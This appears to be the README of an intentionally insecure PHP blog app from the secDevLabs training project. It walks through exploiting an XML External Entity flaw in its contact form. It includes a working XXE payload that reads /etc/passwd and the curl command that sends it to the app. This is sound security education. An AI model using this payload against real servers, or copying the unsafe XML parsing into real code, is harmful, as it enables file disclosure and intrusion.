This is a simple PHP web application that contains an example of an XML External Entity (XXE) vulnerability and the main goal of this app is to describe how a malicious user could exploit it.
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
The main goal of this app is to discuss how XXE vulnerabilities can be exploited and to encourage developers to send secDevLabs Pull Requests on how they would mitigate these flaws.
To start this intentionally insecure application, you will need Docker and Docker Compose. After forking secDevLabs, you must type the following commands to start:
cd secDevLabs/owasp-top10-2017-apps/a4/vinijr-blog
make install
Then simply visit localhost:10080 ! 😆
To properly understand how this application works, you can follow these simple steps:
- Visit its homepage!
- Try sending ViniJR a message.
Now that you know the purpose of this app, what could go wrong? The following section describes how an attacker could identify and eventually find sensitive information about the app or its users. We encourage you to follow these steps and try to reproduce them on your own to better understand the attack vector! 😜
After reviewing the inputs from the app, it is possible to identify that the section "GET IN TOUCH" allows users to send messages to the server, as shown in the following picture:
Using Burp Suite proxy to intercept this request (POST to contact.php) reveals that the message is being built using an XML (if you need any help setting up your proxy you should check this guide):
To replicate this POST using curl, create the following file payload.xml
:
<?xml version="1.0" encoding="UTF-8"?>
<contact>
<name>RAFAEL</name>
<email>[email protected]</email>
<subject>YOU ROCK</subject>
<message>I LOVE WATCHING YOUR SKILLS, MAN</message>
</contact>
And run:
curl -d @payload.xml localhost:10080/contact.php ; echo
By checking the source code of the file, it is possible to see how this XML is loaded on the server side:
As no validation is being used to avoid ENTITIES being sent to the PHP file, an attacker could create the following evilxml.xml
to perform a XXE:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<contact>
<name>&xxe;</name>
<email>[email protected]</email>
<subject>YOU ROCK</subject>
<message>I LOVE WATCHING YOUR SKILLS, MAN</message>
</contact>
And, as the following picture shows, it is possible to realize that the attack succeeds and sensitive information is retrieved from the server that is hosting the vulnerable app:
curl -d @evilxml.xml localhost:10080/contact.php ; echo
How would you mitigate this vulnerability? After your changes, an attacker should not be able to:
- Extract data from the server through the method showed above.
[Spoiler alert 🚨 ] To understand how this vulnerability can be mitigated, check out these pull requests!
We encourage you to contribute to SecDevLabs! Please check out the Contributing to SecDevLabs section for guidelines on how to proceed! 🎉